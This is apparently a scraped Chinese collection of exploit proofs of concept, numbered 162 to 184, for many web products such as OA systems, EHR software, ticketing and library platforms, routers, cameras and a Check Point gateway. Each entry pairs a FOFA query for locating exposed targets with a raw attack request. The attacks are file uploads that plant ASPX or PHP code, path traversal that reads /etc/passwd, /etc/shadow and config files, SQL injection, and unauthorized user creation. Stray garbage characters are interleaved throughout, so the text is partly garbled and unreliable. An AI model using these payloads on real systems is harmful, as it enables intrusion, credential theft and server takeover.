第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
1 h, ?, D* W, Z5 T0 y$ QPOST /Webservice.asmx HTTP/1.1
: A% B& a& {( ?1 T/ ^6 b% T$ _' THost: x.x.x.x
! I" \* w+ @- y/ L; \3 D/ I% UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36, {; z0 t' I& |7 q
Connection: close
  M1 c4 O- w3 o4 u4 H: p: @Content-Length: 445
( r& I+ F1 U! s4 E; y" \( oContent-Type: text/xml/ u6 `# t, i3 f- g
Accept-Encoding: gzip. B5 V1 v  ^/ Q" g. h
: s% W2 @9 \! L! L: G1 r
<?xml version="1.0" encoding="utf-8"?>/ J$ _0 R) _% M9 t! |
<soap:Envelope xmlns:xsi="
  J( }" |0 J3 xhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
. T% K/ U1 m1 E+ ?' q2 Fxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" E. N+ H, B  J( {' ~3 k
<soap:Body>1 [" B! v: W* [+ t+ N4 S
<UploadResume xmlns="http://tempuri.org/">
2 B& q: X* v* v8 s<ip>1</ip>
9 z1 t  _7 S3 o$ B<fileName>../../../../dizxdell.aspx</fileName>
& G+ t* N1 {4 X! C<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
9 {( L  v! B' j4 Q3 k<tag>3</tag>' C: k3 F+ D9 ~. C
</UploadResume>  I8 A3 \2 t/ C+ [5 s$ O( n( w+ r! N
</soap:Body>
6 ?# A% `. o6 A) L; g# W) n</soap:Envelope>: r3 V  C- C4 T* ~3 w

' T- L9 u+ I2 b: S! P# V& |* M" }. B* {- D0 B' [
http://x.x.x.x/dizxdell.aspx
" {$ B' y. x  Y5 [3 S1 Q( O, K$ M& I- C( N- k& I! s- H% e; u6 f
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
& _5 ~/ |/ E* Z4 n- MFOFA: app="和丰山海-数字标牌"
6 I1 D+ O* D$ I. R; \9 g6 C7 OPOST /QH.aspx HTTP/1.1
1 H; E" _' d6 x! [$ J# W% g2 `Host: x.x.x.x
6 a7 G" w2 W" X2 X- e& U$ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0) [) U  G! Q3 \$ A! F, h' d' {3 f
Connection: close
' H6 U8 n, j9 L- u1 v) @Content-Length: 583
9 o( V+ `5 `( DContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey4 `3 I, B/ B; ]4 d  X) C
Accept-Encoding: gzip
2 _1 r4 ?! U8 c* [
2 s8 I% A* x+ `0 H5 V; x------WebKitFormBoundaryeegvclmyurlotuey- \: ~. d1 k3 ~( B- s! ~, T
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
: u* Q8 f, o+ {: e- u3 RContent-Type: application/octet-stream: W) d! K! j% S

) T, }1 q3 V$ x+ ]<% response.write("ujidwqfuuqjalgkvrpqy") %>
& J% @! ?' j7 z0 }8 m9 l------WebKitFormBoundaryeegvclmyurlotuey, y2 B9 g% g7 M6 g
Content-Disposition: form-data; name="action"
" L5 ^! E6 N! h- P9 z- Z' j4 V9 _
; l2 O- h) T7 s7 Supload
& p2 z7 O& U( Z5 z, L------WebKitFormBoundaryeegvclmyurlotuey/ Z/ t3 f) e+ |4 s
Content-Disposition: form-data; name="responderId"2 v2 D9 i  D) f9 W9 l& [

) w/ w" I$ V. F4 T, L& K: pResourceNewResponder
. q0 v: M+ f3 d5 c+ O+ F3 h------WebKitFormBoundaryeegvclmyurlotuey
4 q. e8 x1 F# E, u( fContent-Disposition: form-data; name="remotePath"' B) X4 T* V$ F

7 ^( ^: Q5 F$ U1 s8 F7 h/opt/resources. R0 z! F3 S8 W# u' L
------WebKitFormBoundaryeegvclmyurlotuey--
" |5 _2 @+ t- Z* x+ T
. X: a; q. o2 k% e+ v4 R2 c7 n  x* r
3 o5 _4 ]2 O0 x) @7 G- ohttp://x.x.x.x/opt/resources/kjuhitjgk.aspx5 E6 _$ c  N0 D; q

: h+ [7 k+ |% t2 i' a% [: }0 b163. 号卡极团分销管理系统 ue_serve.php 任意文件上传+ s3 I- a" }( d
FOFA: icon_hash="-795291075"
) B/ |# }5 \2 VPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
" G* I' j# ?+ @6 B+ ~, NHost: x.x.x.x
9 o$ s' N  D  Z# _# a3 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36+ s; k# x$ Y- Z" b
Connection: close! {. c6 b9 j3 n7 `/ ~8 ~
Content-Length: 293
- N9 \; ~3 G8 p* X; SAccept: */*
3 c3 N2 E5 h/ i; vAccept-Encoding: gzip, deflate$ r+ s9 t* L; X- ]. f. R5 v
Accept-Language: zh-CN,zh;q=0.9
! x5 ]5 E- u. L' qContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod( J! T. \3 w$ l

2 X% q7 z1 Q4 q: L5 _------iiqvnofupvhdyrcoqyuujyetjvqgocod
% {! t; u: V" n, p% R7 AContent-Disposition: form-data; name="name"
, P% l2 I) ]! b. s. e$ J: P$ S/ D' v; M/ |
1.php
2 E# |9 X5 ]$ z8 I------iiqvnofupvhdyrcoqyuujyetjvqgocod- h/ E! H8 ^- i  A& `
Content-Disposition: form-data; name="upfile"; filename="1.php"
3 G8 X8 g$ P6 Z& ^7 hContent-Type: image/jpeg+ N9 }& e2 h: ~, i( I8 i6 t
$ P( V3 u2 j+ S
rvjhvbhwwuooyiioxega
4 s5 Z9 W/ r# p------iiqvnofupvhdyrcoqyuujyetjvqgocod--
# j( g9 X5 h" K: [8 g9 Q8 B+ }
2 R. p# h6 I& C/ ~* P" d7 P8 l9 d& I. F! b: Q% j
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传; X( W) e: T2 S* z' l  E& B8 e
FOFA: title="智慧综合管理平台登入"3 G  I: h. t! F4 x2 C' r
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.13 E% X# T5 y2 I6 y, h6 C# J
Host: x.x.x.x( e$ E# ~% h& z; l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0* s  a2 W5 D. r% X4 y
Content-Length: 288+ U4 i4 W$ N- m- x# V
Accept: application/json, text/javascript, */*; q=0.01- Q" Z8 f: J# D$ q! K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,4 }% W: B0 f& Q1 U5 L8 U
Connection: close7 A& ]8 m5 |1 }4 m9 R; [
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
8 c0 q: s, B( x/ b3 I. R6 A  }3 F# tX-Requested-With: XMLHttpRequest0 r! j5 q' p$ Z6 {
Accept-Encoding: gzip4 v( O  J7 ?% i# h( e
( k' s$ H- |  @; m
------dqdaieopnozbkapjacdbdthlvtlyl
( H' U0 x9 N8 q/ G! {Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
6 y6 I' T* u' ?% ]: I0 P2 yContent-Type: image/jpeg
6 F1 k- Z3 B' K' T) a- H/ ^) H! Q  D" I  V
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>0 r6 j' ?' [) G3 g( Y
------dqdaieopnozbkapjacdbdthlvtlyl--
! m# j+ x) M/ ]( P* `9 b! v7 d1 I8 k4 v$ g3 x* ?" N

- o% N  _+ V! U, ehttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
4 K% z$ _2 T+ F" q
7 F, X, l) y; K6 ~1 J0 ~8 f165. OrangeHRM 3.3.3 SQL 注入! k& |8 w. S' ^( i2 L/ F: @$ ?
CVE-2024-36428
5 l" ]$ L! u. X! uFOFA: app="OrangeHRM-产品"
* x+ h* J/ k2 u) L3 kURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))1 d. d+ s; U# |8 H9 I8 j7 @

& m( @5 @+ y9 b& Q0 z, o+ j- K
6 o' `1 I- R) }6 [  o1 s4 W9 m166. 中成科信票务管理平台SeatMapHandler SQL注入
4 g( b1 {" P0 K! tFOFA:body="技术支持:北京中成科信科技发展有限公司"
* X/ Y+ e7 d% n/ T8 [* Q  R$ O  FPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
) k9 }2 @6 d4 w2 zHost:9 k* B$ ^: B6 _8 ?( j/ e
Pragma: no-cache& v9 Y/ \. t! T6 L
Cache-Control: no-cache' p/ n7 B2 @5 m- n3 [, B
Upgrade-Insecure-Requests: 1! E8 e- X$ s0 Y8 F+ t/ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
( X% [2 [+ T. H, A8 b; l3 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% L( U, |* g, @$ E6 f
Accept-Encoding: gzip, deflate
  ^" T2 _, P0 e7 x4 k3 e: pAccept-Language: zh-CN,zh;q=0.9,en;q=0.86 H, M" y: Z5 D6 O- ^( {
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE3 Y0 O' j2 H: x, n5 _
Connection: close9 x% Q- m. h/ Y3 {
Content-Type: application/x-www-form-urlencoded
; T% S; v, I0 [+ V0 p" IContent-Length: 89
! J, u5 x( }. L& F/ U9 `- E" o$ b- Q* r  p# O4 M* U" O' |
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
- H( c1 K9 @7 {& D0 J
4 v  k& m$ s5 x( e2 g) O( h" \4 |
; U2 R$ i7 O- S5 Z167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ {2 Z- S6 H; V! k. m. TFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
0 f9 y. X& Z, Z9 k9 u7 f9 FGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1+ ]: `: E' f  U1 y8 m6 F6 n
Host:
, S0 D) Y+ ~- q- K/ z: e3 S0 p# a' WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ U/ L; J% C( T& }Content-Type: application/x-www-form-urlencoded) l9 _4 z+ r0 [5 E# c! l
Accept-Encoding: gzip, deflate# B* Y1 a' J. l# d
Accept: */** j$ L8 H" [& i# j7 T3 o& q0 X7 q$ e
Connection: keep-alive
" K$ D+ E6 N0 G) m$ j- n5 ~5 ^# |- \7 L% Q6 l. C: |
- d* ^6 h; [6 B
168. 宏景EHR OutputCode 任意文件读取
6 I& W+ r+ |: c/ FFOFA:app="HJSOFT-HCM"* L, u+ N) g# Q6 l8 X
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
9 }% L: Y0 t  z3 J7 [Host: your-ip
, h2 S1 K2 N8 y+ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
; Q* F: w( i5 OContent-Type: application/x-www-form-urlencoded# t- |. r/ N! M2 N1 W
Connection: close4 A  n9 w3 x8 L8 A* }& F# d
& B0 o3 X; a2 R+ Q
: T4 I0 n3 `& X# d

' c% B8 I% O$ B' h- E169. 宏景EHR downlawbase SQL注入2 }+ T: @1 s- f+ v7 q' E+ ]2 V: b
FOFA:app="HJSOFT-HCM"9 J; \* h4 h& h5 c% L. V
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1, l9 d- s3 G: ?6 Z' Y  n+ n
Host: your-ip# S: \$ U1 D3 [# a- I& W( U+ `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. Q7 l% J1 x! C0 ?
Accept: */*
, K0 S0 u" y1 `. W& EAccept-Encoding: gzip, deflate
7 U. V+ {, w2 N4 h% GConnection: close
8 O" v0 O. h' \2 x) |+ R  J# B1 x! J6 \) p  X  W$ T# s) v- d

+ {: E1 S0 X2 c: x
+ \' P# R9 B0 p$ Z" M# [170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 [5 K3 ^4 U; o2 g9 I) p. s
FOFA:body="/general/sys/hjaxmanage.js"
4 J  M# K" w0 A( A" IPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
6 y# i" ^2 O! I7 D5 @Host: balalanengliang2 q% q3 H0 r" r2 b, [
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: F) Z5 }2 O+ g4 m& L- ^7 K" yContent-Type: application/x-www-form-urlencoded# U% T+ I4 [  z. w4 j$ z3 ?: k

: v& F& c( V, c# c) v/ `filename=../webapps/ROOT/WEB-INF/web.xml
4 N' U2 P3 a! V6 v  u
. Y& u* t8 U) P* T0 C& @
  l9 k6 U; U; h0 _171. 通天星CMSV6车载定位监控平台 SQL注入
" J+ h0 d  t- G$ }FOFA:body="/808gps/"- N' @' V8 p  T7 r1 b% ^
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
+ o4 t3 O0 S  f/ R' m3 [Host: your-ip0 X  l2 ^& y+ N- q; X& B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
% i# d  V! b4 Q* |Accept: */*
. k; I0 U! c3 ^/ |- O: ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! L' W6 @4 s1 G' d# L/ s% q. A
Accept-Encoding: gzip, deflate8 M$ Q- C# b, M4 W$ R
Connection: close
$ w5 C& b- C0 n" A4 ]) T" S! ^# K, M7 j% F: }8 x3 T+ Z
- Z; Y1 r3 t3 U* C$ j
7 l3 a3 t* y# t
172. DT-高清车牌识别摄像机任意文件读取, o- V* z5 g, r7 ~- i+ M' }& R2 d
FOFA:app="DT-高清车牌识别摄像机"9 I; U* ?8 H' {  J# w3 c$ L
GET /../../../../etc/passwd HTTP/1.1  L" J0 \0 E: t2 j
Host: your-ip4 O3 \" Q# S& Y7 N7 g" r- R  O" B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 e1 O+ V: H" n0 d) V
Accept-Encoding: gzip, deflate# p, S; E3 N/ t, ]9 v( p5 C3 X, k
Accept: */*
& n! k0 `: A5 T, y# NConnection: keep-alive% {1 V: j& P* m1 k3 V* b' W+ c

6 S0 w" }% z2 U2 [7 n
* l: b6 Z$ ]7 Q% `* \& l
  X5 @4 z1 z+ H, k0 v) a173. Check Point 安全网关任意文件读取
7 ~* I6 e7 O3 g1 }7 A6 z( x. LCVE-2024-24919
  L, y; m# t' J8 ]" z4 X% bFOFA:app="Check_Point-SSL-Network-Extender"
) \7 j! H+ ^& Y/ fPOST /clients/MyCRL HTTP/1.1
' F6 p! z% w0 }Host: your-ip
# Z5 [' C- Z: w  }# uContent-Type: application/x-www-form-urlencoded+ k, _0 ?5 A7 `& s, d$ C' D4 G* y

( [. j( q+ p" j( raCSHELL/../../../../../../../etc/shadow
3 H5 u, H: s- T# z- ?+ b* @2 C9 C# s4 ]# X" f) [- o. Y
  X$ j( a1 }9 N, [

% }9 D9 g2 ~6 n174. 金和OA C6 FileDownLoad.aspx 任意文件读取
, H% |- Y2 k% \; Y: Q$ O6 k3 ~FOFA:app="金和网络-金和OA". Y7 W0 \: A- q# w* Z5 r
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.18 b$ v4 [* a6 @) m* t
Host: your-ip- x  d& h( E# i& N9 @6 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% z6 D7 v3 u! R0 L2 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ b. A8 X3 O: Q3 TAccept-Encoding: gzip, deflate, br3 j8 {. j' A& ]: Y
Accept-Language: zh-CN,zh;q=0.96 l' e  e% m" y7 g
Connection: close7 A; B3 Z* ?0 u2 J# ?( Y7 ^

% w+ Y- X/ z; T% c+ w% _% g9 V9 ?& L' T
, I& G8 d% Y/ E5 z8 |( F8 N$ B2 i
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入+ @/ ?  ]  [$ r5 k2 O, J
FOFA:app="金和网络-金和OA"9 d5 R; ~/ e3 Q3 u# `
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
) }+ Y' ]+ {* y6 ]+ K8 J  n1 ~8 UHost:: t8 N6 H' g. c7 ~/ t. `" w& M# C
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( |/ b7 Z5 L0 R) b5 G8 `% A8 X# ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- N: A; L& ^# p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 I0 `# A' ]7 C$ u) Y+ b3 d; vAccept-Encoding: gzip, deflate1 `4 D  v( w) G$ B: F: x
Connection: close  x* P: U1 \! Z6 J3 [, u5 \- f
Upgrade-Insecure-Requests: 1' m6 V6 ^( P  @- Z. v( F' i. E( ?7 B
9 i6 K5 M" V" ^9 \

* @! Q2 b) J1 w, F176. 电信网关配置管理系统 rewrite.php 文件上传
3 C, x6 F$ B0 x4 U5 |FOFA:body="img/login_bg3.png" && body="系统登录"6 L5 o; p1 Y; {* B5 n
POST /manager/teletext/material/rewrite.php HTTP/1.1" e4 U! s0 T; ?. M" e% h! R, P
Host: your-ip
) R; p0 D8 e# a! k6 w2 C$ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.04 b& _" Q0 l' ]  w
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
3 W/ p" x+ t4 n6 BConnection: close
* m3 H' [! Q5 ~( P; {" v, j. o
* ?9 N5 `& m0 q! h1 ?! I) T) ~------WebKitFormBoundaryOKldnDPT) G* H- u8 _& i$ J3 N/ B
Content-Disposition: form-data; name="tmp_name"; filename="test.php"1 C1 M, k) O% q
Content-Type: image/png
, _9 @  L7 y- E( `7 m- [ ! y) M7 M! b# Y6 ]. L/ h! j
<?php system("cat /etc/passwd");unlink(__FILE__);?>
( ?) n6 t) a  j& _! y. X. ?------WebKitFormBoundaryOKldnDPT' A% @+ {9 d0 L% U* Z+ o
Content-Disposition: form-data; name="uploadtime"
- H9 r7 ?( ^# | * n+ R  t& A% L+ {# d

0 D% c7 L# O- Y( W( u------WebKitFormBoundaryOKldnDPT--
- g% X' v. e( A  {5 i- h$ J6 C% B4 Q3 |6 }: s
% y; {+ P/ ^1 g' ?" s

! ]# M; p0 d& @1 q: }, j0 T2 T& A177. H3C路由器敏感信息泄露' O( K) K! L- i$ b3 O1 `
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg0 ~( x+ e" B' L7 ]1 i( X; r
/userLogin.asp/../actionpolicy_status/../M60.cfg
% D( B+ p/ K" [: z7 L/userLogin.asp/../actionpolicy_status/../GR8300.cfg0 s  j( D) A. m& k- o
/userLogin.asp/../actionpolicy_status/../GR5200.cfg1 h: s  g+ k2 Z6 A  G1 O& a
/userLogin.asp/../actionpolicy_status/../GR3200.cfg* h7 c+ ~2 m8 e  S5 ?
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
. c0 c" [+ L: P/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg; S. W7 _) p+ t2 S2 l& N
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
; J% M  j: A! Q, F) J( a2 M/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
* e( M3 S. d4 w7 z) I/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg% c; E- ]6 }# b) v0 ]! f
/userLogin.asp/../actionpolicy_status/../ER5200.cfg: C: R5 F4 ^& `& j  Q* w; M$ \
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
, a3 f1 A9 S! }' D" R1 N/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
8 m6 g2 p% F, A3 E. M* b! V0 V/userLogin.asp/../actionpolicy_status/../ER3260.cfg/ l: \, {1 Z. l. V9 |( a0 B7 A5 n
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg4 z! e- r& C# b
/userLogin.asp/../actionpolicy_status/../ER3200.cfg4 V) A& _4 M! u- a: X  x
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg6 B/ {! S, ?5 Z  B
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg% d7 D# P! F' i) u* Y% ^# H& T' U7 l
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
; ]& T8 Z7 |. a2 S- {' R& V/userLogin.asp/../actionpolicy_status/../ER3100.cfg
+ {7 C0 r+ q( L" m7 Y6 }8 f/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg; H& K- u4 k! [7 `: ~5 T: d7 Q: Z( r
) L! T" |& P/ a4 P- @" T

& E) v9 ]" ]4 w( C. n178. H3C校园网自助服务系统-flexfileupload-任意文件上传3 I1 S* P) V$ Q) M, h( L
FOFA:header="/selfservice"- e) W* _$ l5 c  z
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.11 X+ P' v- s6 o$ i; S0 E
Host:+ i, A3 b4 v# @  @* C' O) q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& T: R: y# ~% e2 o: R0 F. L; J
Content-Length: 252
9 {' \( `% d1 q1 |Accept-Encoding: gzip, deflate
) Q8 X' w9 a7 X% X/ vConnection: close
) [: w: |$ ^6 v2 SContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
- r' E) S- P7 \) E+ K( k-----------------aqutkea7vvanpqy3rh2l
5 c# L& i1 r6 |5 ^0 JContent-Disposition: form-data; name="12234.txt"; filename="12234", L5 v  l9 E, ~
Content-Type: application/octet-stream* E- `  L/ q3 X' X
Content-Length: 255+ u8 q! |' d+ |& A  A# ~' e

" k, N6 {% N# |# X& e12234* n8 R' m6 w6 P* s. S+ P" y
-----------------aqutkea7vvanpqy3rh2l--( C! ~+ Z  v. d; \# t* {3 A

3 ~$ |" w8 b4 ~* J* [" a4 Y" P$ m) {9 L2 ~$ a- O
GET /imc/primepush/%2e%2e/flex/12234.txt" V  d! s, o$ W1 e1 O8 }6 B& V

- W6 v5 o) A: o% L& @
  g2 @7 w2 p) |  g179. 建文工程管理系统存在任意文件读取. {( t0 k, z- B/ f  R
POST /Common/DownLoad2.aspx HTTP/1.1' M# j3 P% x( y6 U- E6 h/ [
Host: {{Hostname}}* K, Z0 v  v' ?" I9 I! \7 B
Content-Type: application/x-www-form-urlencoded
% _) I2 ]9 }) x; gUser-Agent: Mozilla/5.0
8 W& j) _" s6 I# w! j" s2 h- }/ t4 A4 T
path=../log4net.config&Name=& S* r( e, ?7 p
% \& L# T+ c# g  X
2 [0 Q& U$ A# s( ~
180. 帮管客 CRM jiliyu SQL注入5 ^3 ?8 y, w4 N/ g* f( t
FOFA:app="帮管客-CRM"7 h9 x4 Q4 r/ C' y% [3 j
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1- l9 Q6 n+ g* ?( f6 M$ j
Host: your-ip
# @- b1 V& S' K& Q* q6 G. ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: R1 u' B. }7 @  `- L8 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ V0 x1 K2 x6 |Accept-Encoding: gzip, deflate
; N3 ^7 x7 M  q/ U/ @$ bAccept-Language: zh-CN,zh;q=0.9! S7 n& [2 h; p6 m4 v% p
Connection: close
% C+ W) g, A9 [8 P8 }( [$ J! M, O6 z3 a  `& H. x+ O
* e  v) ?3 D% f! G
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
& V$ F7 ^- c) N7 l, zFOFA:"PDCA/js/_publicCom.js"
0 ]% J8 h! y3 JPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.16 \$ D7 _8 O2 p3 u$ b2 K( p- k
Host: your-ip
! C* }) z8 b& ?) B! u0 t. u6 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 b9 Q5 G, ^8 p& C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 y5 z7 ?; b$ y6 @- i0 U8 DAccept-Encoding: gzip, deflate, br
/ _% W+ F$ B! u) J1 zAccept-Language: zh-CN,zh;q=0.9
8 ~+ X  a7 y+ }Connection: close
! `$ [* ^% D: K- e$ F7 FContent-Type: application/x-www-form-urlencoded
5 s3 k3 I. {& z$ U" _4 }3 s/ z/ f5 z3 ^. W; u$ |
7 T  ?7 C7 z8 V7 P1 ^& Q+ V+ R
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
( B. y0 u: ?5 a( k& M2 C6 o$ `6 S- `" M

9 B  V1 S4 B2 q: Y182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建' e. B& r/ y/ D1 E& N( H
FOFA:"PDCA/js/_publicCom.js"
3 G9 }' D1 R! ~$ d% V. ^( jPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
4 F6 h7 q) {& M4 FHost: your-ip
2 J* K- t  e; t; ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
4 A  K) V* i5 ]; w( k+ Z: b+ AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- d* z, R( E% K2 r( r, OAccept-Encoding: gzip, deflate, br
( E- D1 Q/ H4 nAccept-Language: zh-CN,zh;q=0.9% @& ]& M( |2 s; ~) A( s9 B5 U+ S
Connection: close1 S& T+ s$ d1 n) @8 d2 m
Content-Type: application/x-www-form-urlencoded( q" i9 n" K! i  H2 F

. p: U! z: ~. l! j: W- @. K! P# C) t$ L/ G# N4 W( {6 W; f
username=test1234&pwd=test1234&savedays=11 S6 {6 ^3 g- Z6 x" \& ]4 S
+ B1 w! q' c( J( d8 B$ ]
7 Z7 q( u, p' |$ \
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入0 K- b3 K4 e% D1 ^6 F7 X$ u
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
/ R; Q- M9 p) }* cGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
, V' z: U2 k. k) ]Host: your-ip0 A# ]1 N( O* s9 [) c2 k
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36) e7 d3 F( A. H% J) R  j, A
Accept-Charset: utf-88 x4 ?8 s9 `: m" V# B3 X4 a
Accept-Encoding: gzip, deflate1 p7 x6 L; q- W; v! ?6 e
Connection: close
" U) n3 U- ^( ~# C9 H% ^* {& }9 H# ]( G  R) H! a# R+ ~
6 b2 z" {& `; A2 }) G
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' R5 z3 v5 J( B; H  VFOFA:server="SunFull-Webs"6 j6 p" {+ S! }# p
